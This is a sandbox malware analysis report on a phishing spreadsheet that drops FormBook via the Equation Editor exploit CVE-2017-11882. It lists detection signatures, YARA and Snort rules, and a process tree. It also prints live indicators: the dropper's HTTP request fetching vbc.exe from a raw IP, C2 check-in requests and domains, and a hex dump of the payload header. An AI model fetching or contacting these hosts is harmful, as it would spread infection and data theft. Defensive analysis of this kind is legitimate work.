Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report RFQ HCI20220113.xlsx

Overview

General Information

Sample Name:RFQ HCI20220113.xlsx
Analysis ID:552850
MD5:da4befa8dfe9d56b937b01a2d2818175
SHA1:cf8e6ae0b8afb3d3f2956fbe0c88599fb361ede8
SHA256:87f4b613c197b92f31d5eed4c7ad32a8ba4ae68313d56b54ff656f273fb56d86
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2032 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2016 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2540 cmdline: "C:\Users\Public\vbc.exe" MD5: 83AC585E99B527EEB278702F8F711568)
      • vbc.exe (PID: 2712 cmdline: C:\Users\Public\vbc.exe MD5: 83AC585E99B527EEB278702F8F711568)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmd.exe (PID: 2568 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.topeasyip.company/i5nb/"], "decoy": ["integratedheartspsychology.com", "tappsis.land", "norfg.com", "1531700.win", "oneplusoneexperience.com", "circlessalaries.com", "tlcremodelingcompany.com", "susalud.info", "liyanghua.club", "pink-zemi.com", "orphe.biz", "themodelclarified.com", "candidate.tools", "morotrip.com", "d2dfms.com", "leisuresabah.com", "bjbwx114.com", "lz-fcaini1718-hw0917-bs.xyz", "at-commerce-co.net", "buymypolicy.net", "5151vip73.com", "rentglide.com", "louiecruzbeltran.info", "lanabasargina.com", "lakeforestparkapartments.com", "guangkaiyinwu.com", "bornthin.com", "restaurantkitchenbuilders.com", "ecommerceoptimise.com", "datahk99.com", "markfwalker.com", "granitowawarszawa.com", "theyouthwave.com", "iabg.xyz", "jholbrook.com", "bsc.promo", "xn--grlitzerseebhne-8sb7i.com", "cafeteriasula.com", "plushcrispies.com", "dedicatedvirtualassistance.com", "ventura-taxi.com", "thoethertb434-ocn.xyz", "ylhwcl.com", "bigsyncmusic.biz", "terapiaholisticaemformacao.com", "comidies.com", "171diproad.com", "07dgj.xyz", "vppaintllc.com", "thepatriottutor.com", "wxfive.com", "ceinpsico.com", "tuningelement.store", "asinment.com", "diafraz.xyz", "8crhnwh658ga.biz", "redwolf-tech.com", "ksherfan.com", "sensationalshroom.com", "buy-instagram-followers.net", "treeserviceconsulting.com", "vnln.space", "kate-films.com", "selfmeta.club"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 31 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.0.vbc.exe.400000.9.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.vbc.exe.400000.9.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.0.vbc.exe.400000.9.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
          • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
          • 0x15d18:$sqlite3text: 68 38 2A 90 C5
          • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
          • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
          5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 24 entries

            Sigma Overview

            Exploits:

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.23.213.59, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2016, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2016, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2016, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2540
            Sigma detected: Execution from Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2016, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2540

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.topeasyip.company/i5nb/"], "decoy": ["integratedheartspsychology.com", "tappsis.land", "norfg.com", "1531700.win", "oneplusoneexperience.com", "circlessalaries.com", "tlcremodelingcompany.com", "susalud.info", "liyanghua.club", "pink-zemi.com", "orphe.biz", "themodelclarified.com", "candidate.tools", "morotrip.com", "d2dfms.com", "leisuresabah.com", "bjbwx114.com", "lz-fcaini1718-hw0917-bs.xyz", "at-commerce-co.net", "buymypolicy.net", "5151vip73.com", "rentglide.com", "louiecruzbeltran.info", "lanabasargina.com", "lakeforestparkapartments.com", "guangkaiyinwu.com", "bornthin.com", "restaurantkitchenbuilders.com", "ecommerceoptimise.com", "datahk99.com", "markfwalker.com", "granitowawarszawa.com", "theyouthwave.com", "iabg.xyz", "jholbrook.com", "bsc.promo", "xn--grlitzerseebhne-8sb7i.com", "cafeteriasula.com", "plushcrispies.com", "dedicatedvirtualassistance.com", "ventura-taxi.com", "thoethertb434-ocn.xyz", "ylhwcl.com", "bigsyncmusic.biz", "terapiaholisticaemformacao.com", "comidies.com", "171diproad.com", "07dgj.xyz", "vppaintllc.com", "thepatriottutor.com", "wxfive.com", "ceinpsico.com", "tuningelement.store", "asinment.com", "diafraz.xyz", "8crhnwh658ga.biz", "redwolf-tech.com", "ksherfan.com", "sensationalshroom.com", "buy-instagram-followers.net", "treeserviceconsulting.com", "vnln.space", "kate-films.com", "selfmeta.club"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: RFQ HCI20220113.xlsxVirustotal: Detection: 33%Perma Link
            Source: RFQ HCI20220113.xlsxReversingLabs: Detection: 30%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY
            Antivirus detection for URL or domainShow sources
            Source: http://198.23.213.59/1155/vbc.exeAvira URL Cloud: Label: malware
            Source: www.topeasyip.company/i5nb/Avira URL Cloud: Label: malware
            Source: http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA==Avira URL Cloud: Label: malware
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\Public\vbc.exeAvira: detection malicious, Label: HEUR/AGEN.1211287
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeAvira: detection malicious, Label: HEUR/AGEN.1211287
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 43%
            Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 43%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
            Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 5.0.vbc.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 5.0.vbc.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 5.0.vbc.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000002.520863272.0000000000A50000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483549508.0000000000740000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.482084370.00000000005E0000.00000004.00000001.sdmp, cmd.exe
            Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
            Source: global trafficDNS query: name: www.orphe.biz
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop esi
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.23.213.59:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.23.213.59:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.terapiaholisticaemformacao.com
            Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.220 80
            Source: C:\Windows\explorer.exeNetwork Connect: 195.211.74.112 80
            Source: C:\Windows\explorer.exeDomain query: www.ylhwcl.com
            Source: C:\Windows\explorer.exeDomain query: www.integratedheartspsychology.com
            Source: C:\Windows\explorer.exeDomain query: www.circlessalaries.com
            Source: C:\Windows\explorer.exeNetwork Connect: 221.121.143.148 80
            Source: C:\Windows\explorer.exeDomain query: www.topeasyip.company
            Source: C:\Windows\explorer.exeNetwork Connect: 216.172.160.188 80
            Source: C:\Windows\explorer.exeNetwork Connect: 23.80.120.93 80
            Source: C:\Windows\explorer.exeDomain query: www.ecommerceoptimise.com
            Source: C:\Windows\explorer.exeNetwork Connect: 122.10.28.11 80
            Source: C:\Windows\explorer.exeDomain query: www.bjbwx114.com
            Source: C:\Windows\explorer.exeNetwork Connect: 192.185.98.251 80
            Source: C:\Windows\explorer.exeDomain query: www.orphe.biz
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.topeasyip.company/i5nb/
            Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
            Source: Joe Sandbox ViewASN Name: AS45671-NET-AUWholesaleServicesProviderAU AS45671-NET-AUWholesaleServicesProviderAU
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1Host: www.orphe.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.circlessalaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1Host: www.ylhwcl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.terapiaholisticaemformacao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1Host: www.ecommerceoptimise.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.integratedheartspsychology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1Host: www.bjbwx114.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 103.224.212.220 103.224.212.220
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 02:21:54 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.26Last-Modified: Thu, 13 Jan 2022 22:04:27 GMTETag: "66000-5d57ddeb75e04"Accept-Ranges: bytesContent-Length: 417792Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 3f e0 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 56 06 00 00 08 00 00 00 00 00 00 3a 75 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 74 06 00 57 00 00 00 00 80 06 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 55 06 00 00 20 00 00 00 56 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 80 06 00 00 06 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 75 06 00 00 00 00 00 48 00 00 00 02 00 05 00 7c 46 06 00 64 2e 00 00 03 00 00 00 2d 00 00 06 f8 5d 00 00 84 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 17 00 00 0a 02 03 7d 01 00 00 04 02 28 18 00 00 0a 6f 19 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 04 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 03 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7
            Source: global trafficHTTP traffic detected: GET /1155/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.59Connection: Keep-Alive
